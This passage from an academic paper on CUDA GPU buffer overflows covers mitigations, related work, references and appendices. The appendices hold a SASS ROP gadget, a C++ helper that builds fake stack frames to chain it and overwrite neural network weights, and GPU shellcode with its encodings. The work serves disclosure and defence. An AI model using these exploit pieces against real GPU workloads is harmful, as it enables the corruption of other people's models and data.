Stack cookies. Stack canaries or stack cookies are secret values that are placed between a buffer and control data on the stack to monitor for stack overflows. Unfortunately, NVIDIA has not adopted this technique on their GPUs. In addition, it is important to note that previous studies have already shown that the attacker might be able to determine the value of the stack cookies, thus bypassing the detection mechanism (e.g., [51]).

In fact, several canary-based detection tools (for GPU buffer overflows) have been proposed by researchers, such as GMOD [21], GMODx [20], and clARMOR [22]. They insert a canary before and after every GPU buffer (not just stack buffers) and detect buffer overflows by periodically verifying the integrity of these canaries. These tools have minimal performance overhead. However, they cannot detect OOB read operations or non-adjacent OOB read/write operations.

ASLR and PIE. Both Position Independent Executable (PIE) and ASLR are supported on NVIDIA GPUs. However, we found that the CUDA driver API library that contains powerful ROP gadgets is not compiled as PIE and is loaded at a fixed address even with CUDA ASLR activated (cf. Section 6.2). As a result, ASLR cannot thwart ROP attacks on GPUs. It is not clear why NVIDIA has chosen this design approach. To effectively prevent ROP attacks, it is crucial for NVIDIA to compile this library as PIE and ensure that it is subject to ASLR. In addition, ASLR makes it more difficult for the attacker to launch code injection attacks. However, the attacker might be able to bypass ASLR through side-channel attacks (cf. Section 6.2).

W^X policy. Differentiating between code and data pages is critical for counteracting code injection attacks. As mentioned in Section 4, there is already a read-only bit in the PTE. To understand whether this bit takes effect, we modified the bit through the IOMMU during the execution of a CUDA program, and found that setting this bit effectively prohibits any modifications to the page. Thus, the GPU driver can set this bit for code pages to prevent code modification. In addition, an executable bit needs to be included in order to prevent the execution of data pages.

6.7 Related Work

Research in memory vulnerabilities on GPUs has been very limited. First, in 2016, Miele conducted a preliminary exploration into buffer overflow vulnerabilities in CUDA [38]. This research shows that, on a GTX TITAN Black GPU (Kepler architecture with sm_30), it is possible to exploit a stack overflow to overwrite function pointers, thereby redirecting the execution flow. It further shows that the function call and return mechanism on these GPUs is based on a PRET instruction followed eventually by a RET instruction. The PRET instruction stores the return address in an unknown location, making traditional ROP impractical on these GPUs. In addition, this research concludes that code and data address spaces are separated and thus executing data buffers is not possible. Note that this work also confirmed the feasibility of CUDA heap overflows, although heaps are rarely used in CUDA programs [33].

Second, in the same year, Di et al. conducted similar experiments on a GeForce GTX 750Ti GPU (Maxwell architecture with sm_50) [19], reaching conclusions that align with those from Miele. However, compared to Miele's study, this work provides a much more detailed analysis of GPU heap overflows.

Third, later in 2021, Park et al. performed a deeper analysis of GPU memory exploitation techniques. They presented the first attack on DNN frameworks based on GPU memory manipulation [48]. The experiments in this work were carried out on a GTX 950 GPU (Maxwell architecture with sm_50) and a GTX 1050 GPU (Pascal architecture with sm_60). This work reached several conclusions that are the same as in prior work, such as the hidden return address. However, it also made a new discovery: the code pages are writable on NVIDIA GPUs.

7 Conclusion

In this paper, we present a comprehensive study of the buffer overflow issues in CUDA programs. First, we reverse engineered the mechanisms used to access various GPU memory spaces, demonstrating that buffer overflow errors can cause memory corruption across memory spaces, beyond the data's legitimate scope. Second, we explored the code and data management policies on GPUs, revealing that traditional code injection attacks remain functional on GPUs. We also analyzed the mechanics of function returns and proved the feasibility of CUDA ROP. Finally, we demonstrated that the vulnerabilities discovered in this paper pose significant security risks to DNN applications running on GPUs. The Proof-of-Concept for CUDA code injection and CUDA ROP is available at https://github.com/SecureArch/gpu_mem_attack.

Acknowledgement

The authors thank the anonymous USENIX Security 2024 reviewers and shepherd for their valuable comments and suggestions that helped us improve the quality of the paper. This work is supported in part by the US National Science Foundation (CCF-2334628, CCF-2154973, CCF-2011146, and CNS-2147217).
References

[1] https://developer.nvidia.com/blog/unified-memory-cuda-beginners/.

[2] https://github.com/NVIDIA/open-gpu-kernel-modules/blob/main/kernel-open/nvidia-uvm/uvm_pascal_mmu.c.

[3] CVE-2022-4135. Available at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4135.

[4] CVE-2023-4582. Available at https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4582.

[5] Flan-T5. Available at https://huggingface.co/docs/transformers/en/model_doc/flan-t5.

[6] Four data cleaning techniques to improve large language model (LLM) performance. Available at https://medium.com/intel-tech/four-data-cleaning-techniques-to-improve-large-language-model-llm-performance-77bee9003625.

[7] GPU optimized virtual machine sizes. Available at https://learn.microsoft.com/en-us/azure/virtual-machines/sizes-gpu.

[8] GPU platforms. Available at https://cloud.google.com/compute/docs/gpus.

[9] High-throughput generative inference of large language models with a single GPU.

[10] Hugging Face. Available at https://huggingface.co.

[11] Linux and ASLR. Available at https://linux-audit.com/linux-aslr-and-kernelrandomize_va_space-setting/.

[12] NVIDIA GPU Microarchitecture. Available at https://www.ece.lsu.edu/gp/notes/set-nv-org.pdf.

[13] NVIDIA virtual GPU software documentation v17.0 through 17.1. Available at https://docs.nvidia.com/grid/17.0/index.html.

[14] The GNU C Library. Available at https://www.gnu.org/software/libc/manual/html_mono/libc.html.

[15] Tyler Bletsch, Xuxian Jiang, Vince W Freeh, and Zhenkai Liang. Jump-oriented programming: a new class of code-reuse attack. In Proceedings of the 6th ACM Symposium on Information, Computer and Communications Security (ASIACCS), 2011.

[16] Kumar Chellapilla, Sidd Puri, and Patrice Simard. High performance convolutional neural networks for document processing. In Tenth International Workshop on Frontiers in Handwriting Recognition, 2006.

[17] Sharan Chetlur, Cliff Woolley, Philippe Vandermersch, Jonathan Cohen, John Tran, Bryan Catanzaro, and Evan Shelhamer. cuDNN: Efficient primitives for deep learning. arXiv preprint arXiv:1410.0759, 2014.

[18] Neophytos Christou, Di Jin, Vaggelis Atlidakis, Baishakhi Ray, and Vasileios P Kemerlis. IvySyn: Automated vulnerability discovery in deep learning frameworks. In 32nd USENIX Security Symposium, 2023.

[19] Bang Di, Jianhua Sun, and Hao Chen. A study of overflow vulnerabilities on GPUs. In Network and Parallel Computing: 13th IFIP WG 10.3 International Conference, 2016.

[20] Bang Di, Jianhua Sun, Hao Chen, and Dong Li. Efficient buffer overflow detection on GPU. IEEE Transactions on Parallel and Distributed Systems, 32(5), 2021.

[21] Bang Di, Jianhua Sun, Dong Li, Hao Chen, and Zhe Quan. GMOD: A dynamic GPU memory overflow detector. In Proceedings of the 27th International Conference on Parallel Architectures and Compilation Techniques (PACT), 2018.

[22] Christopher Erb, Mike Collins, and Joseph L. Greathouse. Dynamic buffer overflow detection for GPGPUs. In IEEE/ACM International Symposium on Code Generation and Optimization (CGO), 2017.

[23] Google. Google queue hardening. Available at https://security.googleblog.com/2019/05/queue-hardening-enhancements.html.

[24] Mingcong Han, Hanze Zhang, Rong Chen, and Haibo Chen. Microsecond-scale preemption for concurrent GPU-accelerated DNN inferences. In 16th USENIX Symposium on Operating Systems Design and Implementation (OSDI), 2022.

[25] Ari B Hayes, Fei Hua, Jin Huang, Yanhao Chen, and Eddy Z Zhang. Decoding CUDA binary. In IEEE/ACM International Symposium on Code Generation and Optimization (CGO), 2019.

[26] Kaiming He, Xiangyu Zhang, Shaoqing Ren, and Jian Sun. Identity mappings in deep residual networks. In Computer Vision–ECCV 2016, 2016.

[27] Dan Hendrycks, Collin Burns, Steven Basart, Andy Zou, Mantas Mazeika, Dawn Song, and Jacob Steinhardt. Measuring massive multitask language understanding. arXiv preprint arXiv:2009.03300, 2020.
[28] Sainathan Ganesh Iyer and Anurag Dipakumar Pawar. GPU and CPU accelerated mining of cryptocurrencies and their financial analysis. In 2nd International Conference on I-SMAC (IoT in Social, Mobile, Analytics and Cloud), 2018.

[29] Myeongjae Jeon, Shivaram Venkataraman, Amar Phanishayee, Junjie Qian, Wencong Xiao, and Fan Yang. Analysis of large-scale multi-tenant GPU clusters for DNN training workloads. In USENIX Annual Technical Conference (ATC), 2019.

[30] Yimin Jiang, Yibo Zhu, Chang Lan, Bairen Yi, Yong Cui, and Chuanxiong Guo. A unified architecture for accelerating distributed DNN training in heterogeneous GPU/CPU clusters. In 14th USENIX Symposium on Operating Systems Design and Implementation (OSDI), 2020.

[31] Yonghae Kim, Jaekyu Lee, and Hyesoon Kim. Hardware-based always-on heap memory safety. In 53rd Annual IEEE/ACM International Symposium on Microarchitecture (MICRO), 2020.

[32] Albert Kwon, Udit Dhawan, Jonathan M Smith, Thomas F Knight Jr, and Andre DeHon. Low-fat pointers: Compact encoding and efficient gate-level implementation of fat pointers for spatial safety and capability-based security. In Proceedings of the ACM SIGSAC Conference on Computer & Communications Security (CCS), 2013.

[33] Jaewon Lee, Yonghae Kim, Jiashen Cao, Euna Kim, Jaekyu Lee, and Hyesoon Kim. Securing GPU via region-based bounds checking. In Proceedings of the 49th Annual International Symposium on Computer Architecture (ISCA), 2022.

[34] Tao Liao, Yongjie Zhang, Peter M Kekenes-Huskey, Yuhui Cheng, Anushka Michailova, Andrew D McCulloch, Michael Holst, and J Andrew McCammon. Multi-core CPU or GPU-accelerated multiscale modeling for biomolecular complexes. Computational and Mathematical Biophysics, 1(2013):164–179, 2013.

[35] Ze Liu, Yutong Lin, Yue Cao, Han Hu, Yixuan Wei, Zheng Zhang, Stephen Lin, and Baining Guo. Swin transformer: Hierarchical vision transformer using shifted windows. In Proceedings of the IEEE/CVF International Conference on Computer Vision (ICCV), 2021.

[36] Frank Luna. Introduction to 3D Game Programming with DirectX 12. Mercury Learning and Information, 2016.

[37] John Michalakes and Manish Vachharajani. GPU acceleration of numerical weather prediction. In 2008 IEEE International Symposium on Parallel and Distributed Processing, 2008.

[38] Andrea Miele. Buffer overflow vulnerabilities in CUDA: a preliminary analysis. Journal of Computer Virology and Hacking Techniques, 12:113–120, 2016.

[39] M Miller. Trends, challenges, and strategic shifts in the software vulnerability mitigation landscape. 2019.

[40] NVIDIA. Compute Sanitizer. Available at https://docs.nvidia.com/cuda/compute-sanitizer/index.html.

[41] NVIDIA. CUDA C++ programming guide. Available at https://docs.nvidia.com/cuda/pdf/CUDA_C_Programming_Guide.pdf.

[42] NVIDIA. NVIDIA Grace Hopper Superchip. Available at https://www.nvidia.com/en-us/data-center/grace-hopper-superchip/.

[43] NVIDIA. NVLink and NVSwitch. Available at https://www.nvidia.com/en-us/data-center/nvlink.

[44] NVIDIA. Parallel thread execution ISA version 8.2. Available at https://docs.nvidia.com/cuda/parallel-thread-execution/index.html.

[45] NVIDIA. Pascal MMU format changes. Available at https://nvidia.github.io/open-gpu-doc/pascal/gp100-mmu-format.pdf.

[46] NVIDIA. Tuning CUDA applications for NVIDIA Ampere GPU architecture. Available at https://docs.nvidia.com/cuda/ampere-tuning-guide/index.html.

[47] Jay H Park, Gyeongchan Yun, M Yi Chang, Nguyen T Nguyen, Seungmin Lee, Jaesik Choi, Sam H Noh, and Young-ri Choi. HetPipe: Enabling large DNN training on (whimpy) heterogeneous GPU clusters through integration of pipelined model parallelism and data parallelism. In USENIX Annual Technical Conference (ATC), 2020.

[48] Sang-Ok Park, Ohmin Kwon, Yonggon Kim, Sang Kil Cha, and Hyunsoo Yoon. Mind control attack: Undermining deep learning with GPU memory exploitation. Computers & Security, 102:102115, 2021.

[49] Adam Paszke, Sam Gross, Francisco Massa, Adam Lerer, James Bradbury, Gregory Chanan, Trevor Killeen, Zeming Lin, Natalia Gimelshein, Luca Antiga, et al. PyTorch: An imperative style, high-performance deep learning library. Advances in Neural Information Processing Systems, 32, 2019.
[50] Ryan Roemer, Erik Buchanan, Hovav Shacham, and Stefan Savage. Return-oriented programming: Systems, languages, and applications. ACM Transactions on Information and System Security (TISSEC), 15(1), 2012.

[51] Doaa Abdul-Hakim Shehab and Omar Abdullah Batarfi. RCR for preventing stack smashing attacks bypass stack canaries. In 2017 Computing Conference, 2017.

[52] Haichen Shen, Lequn Chen, Yuchen Jin, Liangyu Zhao, Bingyu Kong, Matthai Philipose, Arvind Krishnamurthy, and Ravi Sundaram. Nexus: A GPU cluster engine for accelerating DNN-based video analysis. In Proceedings of the 27th ACM Symposium on Operating Systems Principles (SOSP), 2019.

[53] Dave Shreiner and The Khronos OpenGL ARB Working Group. OpenGL Programming Guide: The Official Guide to Learning OpenGL, Versions 3.0 and 3.1. Addison-Wesley Professional, 7th edition, 2009.

[54] Karen Simonyan and Andrew Zisserman. Very deep convolutional networks for large-scale image recognition. arXiv preprint arXiv:1409.1556, 2014.

[55] Nikko Ström. Scalable distributed DNN training using commodity GPU cloud computing. 2015.

[56] Peng Sun, Wansen Feng, Ruobing Han, Shengen Yan, and Yonggang Wen. Optimizing network performance for distributed DNN training on GPU clusters: ImageNet/AlexNet training in 1.5 minutes. arXiv preprint arXiv:1902.06855, 2019.

[57] Mohamed Tarek Ibn Ziad, Sana Damani, Aamer Jaleel, Stephen W Keckler, and Mark Stephenson. cuCatch: A debugging tool for efficiently catching memory safety violations in CUDA applications. In Proceedings of the ACM on Programming Languages (PLDI), 2021.

[58] Zhenkai Zhang, Tyler Allen, Fan Yao, Xing Gao, and Rong Ge. Tunnels for bootlegging: Fully reverse-engineering GPU TLBs for challenging isolation guarantees of NVIDIA MIG. In ACM SIGSAC Conference on Computer and Communications Security (CCS), 2023.

[59] Mohamed Tarek Ibn Ziad, Miguel A Arroyo, Evgeny Manzhosov, Ryan Piersma, and Simha Sethumadhavan. No-FAT: Architectural support for low overhead memory safety checks. In ACM/IEEE 48th Annual International Symposium on Computer Architecture (ISCA), 2021.

A GPU List

Table 4 lists all the GPUs on which we have verified the conclusions presented in Section 4.

Table 4: The complete list of tested GPUs.

Architecture    GPU Model
Volta           Tesla V100
Turing          GeForce RTX 2070
Ampere          GeForce RTX 3080
Ampere          A100
Ada Lovelace    GeForce RTX 4090

B ROP Gadgets

An example of the ROP gadget in Section 5 is shown in Listing 6. Each execution of this gadget modifies a weight value, and we execute it repeatedly to modify multiple weights. Specifically, we prepare the stack so that each time the gadget executes, two conditions are met: 1) the address of the first instruction in the gadget is stored at [R1+0x18] and is thus loaded into R20; 2) the address of the next weight is stored at [R1+0x38] and is thus loaded into R28. Consequently, each execution of this gadget first modifies a weight value using the ST instruction, then updates R28 to the address of the next weight, and finally returns to the start of the gadget to modify the subsequent weight. If there are a large number of weights to modify and the stack size is insufficient to support the repeated execution of this gadget, we use multiple malicious user requests, and thus multiple ROP attacks, to complete the task.

ST.E.64 [R28.64], R4 ;
BSYNC B7 ;
LDL R0, [R1] ;
BMOV.32 B6, R27 ;
LDL R20, [R1+0x18] ;
LDL R21, [R1+0x1c] ;
LDL R2, [R1+0x4] ;
LDL R16, [R1+0x8] ;
...
LDL R19, [R1+0x14] ;
LDL R22, [R1+0x20] ;
...
LDL R29, [R1+0x3c] ;
IADD3 R1, R1, 0x40, RZ ;
BMOV.32 B7, R0 ;
RET.ABS.NODEC R20 0x0 ;

Listing 6: An example ROP gadget.
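To make the stack preparation described above concrete, the host-side sketch below lays out one fake 0x40-byte frame per gadget execution, following the offsets popped by the LDL sequence in Listing 6. The function name, the use of a byte vector, and the 4-byte weight size are our own illustrative assumptions; in the real attack these bytes must be delivered through the overflowing input buffer rather than written directly:

// Illustrative payload layout only, not the exact attack code.
#include <cstdint>
#include <cstring>
#include <vector>

std::vector<uint8_t> build_fake_frames(uint64_t gadget_addr,
                                        uint64_t first_weight_addr,
                                        size_t num_weights) {
    std::vector<uint8_t> frames(num_weights * 0x40, 0);
    for (size_t i = 0; i < num_weights; i++) {
        uint8_t *f = frames.data() + i * 0x40;        // one frame per gadget execution
        uint64_t next_weight = first_weight_addr + (i + 1) * sizeof(float);
        // [R1+0x18]/[R1+0x1c] -> R20/R21: the popped "return address" points back
        // to the start of the gadget, so every frame re-enters the gadget.
        std::memcpy(f + 0x18, &gadget_addr, sizeof(gadget_addr));
        // [R1+0x38]/[R1+0x3c] -> R28/R29: address of the next weight to overwrite.
        std::memcpy(f + 0x38, &next_weight, sizeof(next_weight));
    }
    return frames;
}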
C Shellcode

An example of the shellcode used in the code injection attack is shown in Table 7. It writes the value 0xffffffff to a range of memory addresses, from 0x7fffdeadbeef to 0x7fffdeadbeef+0xaaaa.

D System Specifications

The cloud system used for the experiments in Section 5 is specified in Table 5.

Table 5: Platform details.

CPU                Intel Xeon Silver 4114
Hypervisor         KVM on Ubuntu 20.04
Virtual machine    Ubuntu 20.04
GPU                NVIDIA A100
GPU architecture   Ampere
vGPU version       15.4
vGPU license       vWS
vGPU memory        40GB
CUDA version       12.4

E LLM Attacks

We test the memory corruption attacks, including the code injection attack and the ROP attack, on three LLMs: Flan-T5-Small, Flan-T5-Base, and Flan-T5-Large [5]. We assume a buffer overflow vulnerability in the data pre-processing stage (e.g., for noise removal [6]), similar to the one assumed in Section 5.

Table 6: The LLM inference accuracy (with MMLU [27]) after the weight modification attacks.

DNN Model        Clean acc.   Uncontrolled weight modification
                              10%     20%     50%     100%
Flan-T5-Small    29.5%        29.2%   28.6%   28.3%   28.2%
Flan-T5-Base     34.2%        33.2%   32.6%   28.9%   29.5%
Flan-T5-Large    42.0%        41.3%   40.5%   39.1%   35.0%

Similar to the attacks on the vision models (cf. Section 5), the code injection attack (with controlled written values) can reduce the accuracy of the LLMs to the level of random guessing. However, as shown in Table 6, the ROP attack, where the written value is not controlled by the attacker, has a limited effect on the accuracy of the LLMs.

F JOP+ROP Attack

An example of combining JOP and ROP gadgets is shown in Figure 8. Here we assume that R4 contains the address of the helper gadget, which is used to chain the JOP gadgets (with the ROP gadgets). Every time after executing a JOP gadget, it jumps to the helper gadget, which then pops the address of the next gadget from the stack and returns to it.

Figure 8: An example of combining JOP and ROP, assuming that R4 contains the address of the helper gadget.

Table 7: An example shellcode.

/* 0000 */ MOV R0, 0xffffffff ;
/* 0xffffffff00007802 */
/* 0x003fde0000000f00 */
/* 0010 */ MOV R4, 0xdeadbeef ;
/* 0xdeafbeef00047802 */
/* 0x003fde0000000f00 */
/* 0020 */ MOV R5, 0x7fff ;
/* 0x00007fff00057802 */
/* 0x003fde0000000f00 */
/* 0030 */ MOV R3, RZ ;
/* 0x000000ff00037202 */
/* 0x003fde0000000f00 */
/* 0040 */ MOV R6, R3 ;
/* 0x0000000300067202 */
/* 0x003fde0000000f00 */
/* 0050 */ MOV R3, R6 ;
/* 0x0000000600037202 */
/* 0x003fde0000000f00 */
/* 0060 */ ISETP.LT.AND P0, PT, R3, 0xaaaa, PT ;
/* 0x0000aaaa0300780c */
/* 0x003fde0003f01270 */
/* 0070 */ PLOP3.LUT P0, PT, P0, PT, PT, 0x8, 0x0 ;
/* 0x000000000000781c */
/* 0x003fde000070e170 */
/* 0080 */ @P0 BRA 0x150 ;
/* 0x000000c000000947 */
/* 0x003fde0003800000 */
/* 0090 */ MOV R6, R3 ;
/* 0x0000000300067202 */
/* 0x003fde0000000f00 */
/* 00a0 */ SHF.R.S32.HI R7, RZ, 0x1f, R6 ;
/* 0x0000001fff077819 */
/* 0x003fde0000011406 */
/* 00b0 */ SHF.L.U64.HI R7, R6, 0x2, R7 ;
/* 0x0000000206077819 */
/* 0x003fde0000010207 */
/* 00c0 */ SHF.L.U32 R6, R6, 0x2, RZ ;
/* 0x0000000206067819 */
/* 0x003fde00000006ff */
/* 00d0 */ MOV R10, R4 ;
/* 0x00000004000a7202 */
/* 0x003fde0000000f00 */
/* 00e0 */ MOV R11, R5 ;
/* 0x00000005000b7202 */
/* 0x003fde0000000f00 */
/* 00f0 */ IADD3 R6, P0, R10, R6, RZ ;
/* 0x000000060a067210 */
/* 0x003fde0007f1e0ff */
/* 0100 */ IADD3.X R7, R11, R7, RZ, P0, !PT ;
/* 0x000000070b077210 */
/* 0x003fde00007fe4ff */
/* 0110 */ ST.E [R6.64], R0 ;
/* 0x0000000006007985 */
/* 0x0033de000c101904 */
/* 0120 */ IADD3 R6, R3, 0x1, RZ ;
/* 0x0000000103067810 */
/* 0x003fde0007ffe0ff */
/* 0130 */ MOV R7, R6 ;
/* 0x0000000600077202 */
/* 0x003fde0000000f00 */
/* 0140 */ BRA 0x160 ;
/* 0xffffff0000007947 */
/* 0x003fde000383ffff */
/* 0150 */ EXIT ;
/* 0x000000000000794d */
/* 0x003fde0003800000 */